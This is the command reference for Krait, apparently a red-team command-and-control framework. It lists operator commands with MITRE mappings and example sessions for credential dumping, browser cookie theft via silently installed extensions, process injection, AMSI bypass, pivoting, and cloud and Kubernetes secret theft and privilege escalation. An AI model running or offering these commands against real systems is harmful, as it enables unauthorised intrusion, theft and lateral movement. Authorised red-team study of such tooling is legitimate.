Command Reference
Every operator command with usage, examples, and MITRE mapping
All operator commands available in the Krait console. Commands are entered at the krait> prompt (global) or krait [agent_id]> prompt (session-scoped).
Session Management
| Command | Usage | Description |
|---|---|---|
sessions | sessions | List all agent sessions with status, transport, hostname, PID, last seen, and lock holder |
use | use <id> | Lock and switch to an agent session. Prefix match on agent ID is supported. Use --force to override another operator’s lock |
background | background | Release the current agent lock and return to session-select mode |
rename | rename <id> <name> | Assign a friendly name to a session (e.g., rename abc12 dc01) |
kill | kill <id> | Queue an exit task to a specific agent without switching to it |
remove | remove <id> | Remove a dead or stale session from the session list |
graph | graph | Display the agent topology as an ASCII tree showing parent-child relationships |
graph dot | graph dot | Output a DOT-format graph (pipe to graphviz: graph dot | dot -Tpng -o graph.png) |
Execution
| Command | Usage | Description | MITRE |
|---|---|---|---|
<bofname> | whoami, ps, sysinfo | Queue a BOF by its short name. See BOF Reference for the full list | Varies |
<bofname> <args> | ls C:\Users, cat C:\flag.txt | Queue a BOF with arguments | Varies |
cmd | cmd <command> | Run a shell command via cmd.exe /C. Output is captured | T1059.003 |
powershell | powershell <command> | Run a PowerShell command (hidden window, no profile) | T1059.001 |
execute-assembly | execute-assembly <path> [args] | Run a .NET assembly in-process with full evasion (HWBP AMSI/ETW bypass, LoadLibrary proxy) | T1620 |
powerpick | powerpick <cmd> | Run PowerShell command in-process via .NET CLR (no powershell.exe) | T1059.001 |
sleep | sleep <seconds> | Set a one-shot sleep (agent sleeps this long once, then resumes normal interval) | - |
interval | interval <seconds> [jitter%] | Set the poll interval and optional jitter percentage | - |
exit | exit | Queue an exit task — the implant terminates on next poll | - |
migrate | migrate [target] | Migrate to a new process. Target is a process name (e.g., dllhost.exe). Standard builds use reflective PE injection; --ghost builds use process ghosting; --herpaderp attempts file overwrite then falls back to ghost cleanup. Default target: dllhost.exe. Avoid UWP redirect stubs (calc.exe, mspaint.exe, snippingtool.exe) with --remote-thread or --all-evasion — they exit before the remote thread can register. Use dllhost.exe, notepad.exe, or runtimebroker.exe. | T1055 |
inject | inject <pid> | Inject agent into a running process. Linux: ptrace + memfd_create. macOS: task_for_pid (requires root + SIP disabled). Current agent exits after successful injection | T1055 |
spawn | spawn <path> | Spawn a new process with the agent loaded via DYLD_INSERT_LIBRARIES (macOS only). Works with SIP enabled — target must not be Apple-hardened. Current agent stays alive; new agent registers separately | T1055 |
chain | chain <cmd1>;<cmd2>;... | Chain multiple BOFs into a single task. All execute sequentially on one poll cycle | - |
File Operations
| Command | Usage | Description | MITRE |
|---|---|---|---|
download | download <remote> [local] | Download a file from the target (8MB chunks, resumable on interruption) | T1041 |
upload | upload <local> <remote> | Upload a local file to the target | T1105 |
cd | cd <path> | Change the remote working directory | - |
ls | ls [path] | List directory contents (default: current directory) | T1083 |
cat | cat <path> | Display file contents | T1005 |
cp | cp <src> <dst> | Copy a file on the target | - |
mv | mv <src> <dst> | Move or rename a file on the target | - |
rm | rm <path> | Delete a file on the target | T1070.004 |
mkdir | mkdir <path> | Create a directory on the target | - |
Peer-to-Peer (P2P)
| Command | Usage | Description | MITRE |
|---|---|---|---|
link | link <host> <pipe_name> | Connect to an SMB child agent via named pipe | T1570 |
tcp-link | tcp-link <port> | Listen for a TCP child agent to connect back | T1570 |
unlink | unlink <child_id> | Disconnect a child agent from the current parent | - |
SOCKS Proxy
| Command | Usage | Description | MITRE |
|---|---|---|---|
socks start | socks start [port] | Start a SOCKS5 proxy through the current agent (default port: 1080) | T1572 |
socks stop | socks stop | Stop the SOCKS5 proxy | - |
socks status | socks status | Show SOCKS proxy status | - |
Operator
| Command | Usage | Description |
|---|---|---|
list | list or list <category> | List available BOFs, optionally filtered by category |
queue | queue | Show pending tasks for the current agent |
results | results | Show received task results |
save | save <task_id> <path> | Save a task result to a local file |
stage | stage <file> | Load an encrypted payload for staged delivery |
log | log [n] | Show the event log (last n entries, default: all) |
timeline | timeline | Show the event timeline |
redirector | redirector | Show the active traffic profile URIs |
redirector nginx | redirector nginx --backend <url> [options] | Generate nginx HTTPS redirector config |
redirector dns | redirector dns --domain <domain> --backend <ip> [options] | Generate DNS redirector config |
redirector cloudfront | redirector cloudfront --origin <host> [options] | Generate CloudFront CDN redirector config (nginx + distribution setup) |
operators | operators | Show connected operators and their active sessions |
report | report [path] | Export MITRE ATT&CK Navigator JSON layer |
python | python <script> | Run an impacket script through the operator proxy |
proxy | proxy <command> | Run a command through the SOCKS proxy (proxychains) |
clear | clear | Clear the console |
verbose | verbose [0|1] | Set output verbosity: 0 = results only, 1 = operational messages (default) |
creds | creds [list|add|remove|clear] | Manage the credential store (auto-populated from BOF output). Use @cred:<id> to reference stored credentials in commands |
help | help | Show the command help |
quit | quit | Disconnect the CLI |
Persistence
| Command | Usage | Description | MITRE |
|---|---|---|---|
chrome-persist-install | chrome-persist-install [--browser chrome|edge] --server URL [--profile name] [--cover name] [--force] | Silent Chrome/Edge extension install with HMAC recalculation | T1176 |
chrome-persist-remove | chrome-persist-remove [--browser chrome|edge] [--force] | Remove silently installed Chrome/Edge extension | T1176 |
Chrome Extension
Commands available when a Chrome extension is installed via chrome-persist-install.
| Command | Usage | Description | MITRE |
|---|---|---|---|
ext-cookies | ext-cookies [domain] | Dump browser cookies (optional domain filter) | T1539 |
ext-tabs | ext-tabs | List open browser tabs (URL, title) | T1185 |
ext-screenshot | ext-screenshot | Capture visible tab as PNG screenshot | T1113 |
ext-history | ext-history [query] [max] | Browse history (default 100, optional search) | T1217 |
ext-navigate | ext-navigate <url> | Navigate active tab to URL | T1185 |
ext-nmh | ext-nmh <cmd|whoami|ps|ping> [cmdline] | Execute commands via Native Messaging Host proxy | T1106 |
Cloud — AWS
BOFs for AWS credential discovery, resource access, and lateral movement. Available on both Windows and Linux agents. Credentials are sourced from IMDS, environment variables, or explicit --access-key/--secret-key/--token arguments.
Credential Discovery & Validation
| Command | Usage | Description | MITRE |
|---|---|---|---|
aws-whoami | aws-whoami | Call sts:GetCallerIdentity — returns account ID, ARN, and user ID | T1087.004 |
aws-imds-creds | aws-imds-creds | Query EC2 instance metadata (IMDSv1/v2) for IAM role credentials | T1552.005 |
aws-iam-enum | aws-iam-enum [--user NAME] | Enumerate IAM policies, groups, and attached permissions | T1087.004 |
aws-assume-role | aws-assume-role <role-arn> [--session NAME] | Call sts:AssumeRole and return temporary credentials | T1550.001 |
aws-cred-search | aws-cred-search [path] | Search filesystem for AWS credential files, configs, and environment files | T1552.001 |
Cloud Resource Access
| Command | Usage | Description | MITRE |
|---|---|---|---|
aws-s3-ls | aws-s3-ls [bucket] [--prefix PATH] | List S3 buckets or objects in a bucket | T1619 |
aws-s3-get | aws-s3-get <bucket> <key> | Download an object from S3 | T1530 |
aws-ec2-enum | aws-ec2-enum [--region REGION] | Enumerate EC2 instances (ID, type, state, IP, name) | T1580 |
aws-lambda-enum | aws-lambda-enum [--region REGION] | List Lambda functions with runtime, role, and environment variables | T1526 |
aws-secrets-manager | aws-secrets-manager [--secret NAME] | List or retrieve Secrets Manager secrets | T1528 |
aws-ssm-params | aws-ssm-params [--path PATH] [--decrypt] | List or retrieve SSM Parameter Store values | T1552.001 |
aws-ec2-userdata | aws-ec2-userdata [--instance ID] | Retrieve EC2 instance user-data (often contains bootstrap secrets) | T1552.005 |
Lateral Movement
| Command | Usage | Description | MITRE |
|---|---|---|---|
aws-ssm-exec | aws-ssm-exec <instance-id> <command> | Execute a command on an EC2 instance via SSM RunCommand | T1021.007 |
aws-lambda-exec | aws-lambda-exec <function-name> [payload] | Invoke a Lambda function with optional JSON payload | T1648 |
aws-ec2-connect | aws-ec2-connect <instance-id> [--user NAME] | Push an SSH key via EC2 Instance Connect and return the connection command | T1021.004 |
Cloud — Azure
BOFs for Azure resource enumeration and lateral movement via the Azure Resource Manager API. Available on both Windows and Linux agents. Authenticate with a managed identity token from IMDS or an explicit --token argument.
| Command | Usage | Description | MITRE |
|---|---|---|---|
azure-imds-token | azure-imds-token [resource] | Request managed identity OAuth2 token from Azure IMDS | T1552.005 |
azure-cred-search | azure-cred-search | Search environment and metadata for Azure credentials | T1552.001 |
azure-whoami | azure-whoami [--token TOKEN] | Identify current Azure principal (subscriptions + tenant) | T1087.004 |
azure-keyvault | azure-keyvault <vault> [--secret NAME] [--token TOKEN] | List Key Vault secrets and retrieve secret values | T1552.001 |
azure-storage-ls | azure-storage-ls <account> [--container NAME] [--token TOKEN] | List Azure Storage containers and blobs | T1619 |
azure-blob-get | azure-blob-get <account> <container> <blob> [--token TOKEN] | Download blob content from Azure Storage | T1530 |
azure-vm-enum | azure-vm-enum [--subscription ID] [--token TOKEN] | Enumerate Azure VMs across subscriptions | T1580 |
azure-vm-runcommand | azure-vm-runcommand <vm> <rg> <subscription> <cmd> [--token TOKEN] | Execute commands on Azure VMs via Run Command API | T1021.007 |
Cloud — Entra ID
BOFs for Microsoft Entra ID (Azure AD) identity-plane enumeration, credential access, and privilege escalation via the Microsoft Graph API. Available on both Windows and Linux agents. Authenticate with a managed identity token from IMDS or an explicit --token argument.
Identity Enumeration
| Command | Usage | Description | MITRE |
|---|---|---|---|
entra-whoami | entra-whoami [--token TOKEN] | Show current Entra ID identity (tenant, UPN, roles) | T1087.004 |
entra-users | entra-users [--token TOKEN] | List Entra ID users with key attributes | T1087.004 |
entra-groups | entra-groups [--token TOKEN] | List Entra ID groups | T1069.003 |
entra-group-members | entra-group-members <group_id> [--token TOKEN] | List members of an Entra ID group | T1069.003 |
entra-roles | entra-roles [--token TOKEN] | List Entra ID directory roles and assignments | T1069.003 |
entra-role-members | entra-role-members <role_id> [--token TOKEN] | List members of a specific directory role | T1069.003 |
entra-sps | entra-sps [--token TOKEN] | List Entra ID service principals | T1087.004 |
entra-condaccess | entra-condaccess [--token TOKEN] | List conditional access policies | T1518 |
Credential & Secret Access
| Command | Usage | Description | MITRE |
|---|---|---|---|
entra-app-secrets | entra-app-secrets [--token TOKEN] | List application registrations with credentials | T1552.006 |
entra-app-add-secret | entra-app-add-secret <object_id> [--token TOKEN] [--name NAME] | Add a client secret to an application registration | T1098.001 |
entra-oauth-grants | entra-oauth-grants [--token TOKEN] | List OAuth2 permission grants (delegated permissions) | T1550.001 |
Privilege Escalation
| Command | Usage | Description | MITRE |
|---|---|---|---|
entra-role-assign | entra-role-assign <role_id> <principal_id> [--token TOKEN] | Assign a directory role to a principal | T1098.003 |
entra-app-roles | entra-app-roles <sp_id> [--token TOKEN] | List app role assignments for a service principal | T1069.003 |
entra-pim | entra-pim [--token TOKEN] | List PIM eligible role assignments | T1069.003 |
Kubernetes
BOFs for Kubernetes enumeration via the API server. Authenticate with a service account bearer token (auto-detected from pod mount or --token argument).
| Command | Usage | Description | MITRE |
|---|---|---|---|
k8s-enum | k8s-enum [--namespace NS] | Enumerate pods, services, namespaces, and deployments | T1613 |
k8s-secrets | k8s-secrets [--namespace NS] [--name SECRET] | List or dump Kubernetes secrets (base64-decoded) | T1552.007 |
k8s-rbac | k8s-rbac [--namespace NS] | Enumerate roles, cluster roles, and role bindings | T1069.003 |
Multi-Operator Commands
| Command | Usage | Description |
|---|---|---|
operators | operators | List connected operators, their connection time, and which agent they’re locked to |
use --force | use <id> --force | Override another operator’s lock on an agent (they receive a notification) |
Using BOFs
BOFs (Beacon Object Files) are called by their short name. Arguments follow the name, separated by spaces.
krait [abc12345]> whoami
krait [abc12345]> ps
krait [abc12345]> ls C:\Users
krait [abc12345]> cat C:\Windows\System32\drivers\etc\hosts
krait [abc12345]> hashdump
krait [abc12345]> nanodump
krait [abc12345]> execute-assembly /opt/Seatbelt.exe -group=all
krait [abc12345]> wmi_exec 10.0.0.5 administrator Password1 "whoami"
krait [abc12345]> persist_comhijack install C:\path\to\proxy.dll
For the full BOF list with arguments and descriptions, see the BOF Reference.
Chaining
Chain multiple commands into a single task that executes sequentially on one poll cycle:
krait [abc12345]> chain whoami;ps;sysinfo;hostname
krait [abc12345]> chain ls C:\Users;cat C:\Users\admin\Desktop\flag.txt
Useful for reducing the number of callbacks when operating over a high-latency transport or when you need multiple recon results from the same poll.
Credential Store
Krait automatically extracts credentials from BOF output and stores them for reuse. Supported extraction sources: hashdump, samdump, enum-autologon, enum-creds, dpapi-creds, wifi-passwords, make-token, dump-chrome, dump-chromium, dump-firefox, rdp-thief, shspawnas, adduser, and setuserpass.
Managing Credentials
krait> creds list # list all stored credentials
krait> creds list type=ntlm # filter by type
krait> creds list domain=CORP # filter by domain
krait> creds add plaintext CORP\admin P@ss # manually add a credential
krait> creds remove 3 # remove credential #3
krait> creds clear # remove all credentials
Credential References (@cred:)
Instead of copy-pasting usernames and passwords into commands, reference stored credentials inline with @cred:<id>. References are resolved server-side before dispatch, so they work from both the CLI and Web UI.
Syntax:
| Reference | Resolves to | Example |
|---|---|---|
@cred:<id> | DOMAIN\username password | @cred:3 → CORP\admin P@ssw0rd |
@cred:<id>.username | Username only | @cred:3.username → admin |
@cred:<id>.domain | Domain only | @cred:3.domain → CORP |
@cred:<id>.user | DOMAIN\username | @cred:3.user → CORP\admin |
@cred:<id>.secret | Password or hash | @cred:3.secret → P@ssw0rd |
@cred:<id>.type | Credential type | @cred:3.type → plaintext |
Usage examples:
krait [abc12345]> make-token @cred:3.domain @cred:3.username @cred:3.secret
[*] @cred:3.domain → CORP
[*] @cred:3.username → admin
[*] @cred:3.secret → P@ssw0rd
[+] Queued BOF task 4: make_token.x64.o
krait [abc12345]> shspawnas @cred:3.domain @cred:3.username @cred:3.secret notepad.exe sc.bin
krait [abc12345]> wmi_exec 10.0.0.5 @cred:3.username @cred:3.secret "whoami"
References also work in chain commands:
krait [abc12345]> chain make-token @cred:3.domain @cred:3.username @cred:3.secret;ls \\dc01\c$
OPSEC: The event log records the original command with @cred: references intact — plaintext credentials never appear in logs. Only the resolved form is sent to the agent.
If a @cred:<id> reference doesn’t match a stored credential, it passes through unresolved (the literal text is sent). The CLI previews each resolution before dispatch so you can verify the right credential was selected.